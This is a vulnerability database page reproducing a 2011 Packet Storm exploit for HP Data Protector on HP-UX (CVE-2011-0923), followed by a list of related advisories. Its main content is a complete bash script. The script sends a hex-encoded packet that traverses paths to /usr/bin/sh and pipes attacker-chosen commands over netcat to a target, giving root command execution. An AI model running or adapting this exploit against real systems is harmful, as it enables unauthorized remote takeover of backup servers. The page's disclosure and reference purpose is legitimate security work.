Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAdrian Puente Z.PACKETSTORM:103738
HistoryAug 05, 2011 - 12:00 a.m.

HP Data Protector Remote Shell

2011-08-0500:00:00
Adrian Puente Z.
packetstormsecurity.com
15

0.973 High

EPSS

Percentile

99.9%

JSON
`#!/bin/bash  
# Exploit Title: HP Data Protector Remote Shell for HPUX  
# Date: 2011-08-02  
# Author: Adrian Puente Z.  
# Software Link:http://www8.hp.com/us/en/software/software-  
# product.html?compURI=tcm:245-936920&pageTitle=data-protector  
# Version: 0.9  
# Tested on: HPUX  
# CVE: CVE-2011-0923  
# Notes: ZDI-11-055  
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/  
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/  
# Document.jsp?objectID=c02781143  
#  
# Powered by Hackarandas www.hackarandas.com  
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks  
# Lots of thanks to David Llorens (@c4an) for all the help.  
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.  
# Windows version: http://www.exploit-db.com/exploits/17339/  
#  
#  
# Shouts to shellhellboy, r3x, r0d00m, etlow,   
# psymera, nitr0us and ppl in #mendozaaaa  
#  
#  
  
[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` <host> <port> <commands>\n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)  
" && exit 0  
  
HOST=`echo ${@} | awk '{print $1}'`  
PORT=`echo ${@} | awk '{print $2}'`  
CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'`  
SC=""  
SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"  
SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"  
SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"  
SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"  
SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"  
SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"  
SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"  
SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"  
SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"  
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
SHELLCODE=${SC}  
( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}  
  
  
`

Related

packetstorm 4
saint 4
seebug 4
securityvulns 3
prion 1
exploitpack 4
checkpoint_advisories 2
cvelist 1
nvd 1
cve 1
zdt 1
zdi 1
openvas 2
exploitdb 4
packetstorm
packetstorm
HP Data Protector Arbitrary Remote Command Execution
2013-08-07 00:00:00
HP Data Protector Arbitrary Remote Command Execution
2013-08-07 00:00:00
HP Data Protector Client Code Execution
2011-05-28 00:00:00
saint
saint
HP Data Protector Client EXEC_CMD Command Execution
2011-06-07 00:00:00
HP Data Protector Client EXEC_CMD Command Execution
2011-06-07 00:00:00
HP Data Protector Client EXEC_CMD Command Execution
2011-06-07 00:00:00
seebug
seebug
HP Data Protector Arbitrary Remote Command Execution
2014-07-01 00:00:00
HP Data Protector - Remote Root Shell (Linux Version)
2014-07-01 00:00:00
HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)
2014-07-01 00:00:00
securityvulns
securityvulns
HP Data Protector Arbitrary Remote Command Execution
2013-08-12 00:00:00
HP Data Protector code execution
2013-08-12 00:00:00
[security bulletin] HPSBMA02654 SSRT100441 rev.1 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code
2011-04-27 00:00:00
prion
prion
Command injection
2011-02-09 01:00:00
exploitpack
exploitpack
HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution
2011-05-28 00:00:00
HP Data Protector (Linux) - Remote Command Execution
2011-08-10 00:00:00
HP Data Protector - Remote Command Execution
2013-08-07 00:00:00
checkpoint_advisories
checkpoint_advisories
HP Data Protector Client EXEC_CMD Command Execution (CVE-2011-0923)
2011-11-01 00:00:00
Hp Data Protector Remote Client EXEC_CMD Code Execution - Ver2 (CVE-2011-0923)
2018-07-05 00:00:00
cvelist
cvelist
CVE-2011-0923
2011-02-09 00:00:00
nvd
nvd
CVE-2011-0923
2011-02-09 01:00:09
cve
cve
CVE-2011-0923
2011-02-09 01:00:09
zdt
zdt
HP Data Protector Arbitrary Remote Command Execution
2013-08-07 00:00:00
zdi
zdi
(0Day) Hewlett-Packard Data Protector Client EXEC_CMD Perl Remote Code Execution Vulnerability
2011-02-07 00:00:00
openvas
openvas
HP (OpenView Storage) Data Protector Client 'EXEC_CMD' RCE Vulnerability
2011-06-13 00:00:00
HP (OpenView Storage) Data Protector Multiple Vulnerabilities
2014-02-18 00:00:00
exploitdb
exploitdb
HP Data Protector Client 6.11 - &#039;EXEC_CMD&#039; Remote Code Execution
2011-05-28 00:00:00
HP Data Protector (HP-UX) - Remote Shell
2011-08-05 00:00:00
HP Data Protector (Linux) - Remote Command Execution
2011-08-10 00:00:00

0.973 High

EPSS

Percentile

99.9%

JSON
Related for PACKETSTORM:103738
packetstorm4saint4seebug4securityvulns3prion1exploitpack4checkpoint_advisories2cvelist1nvd1cve1zdt1zdi1openvas2exploitdb4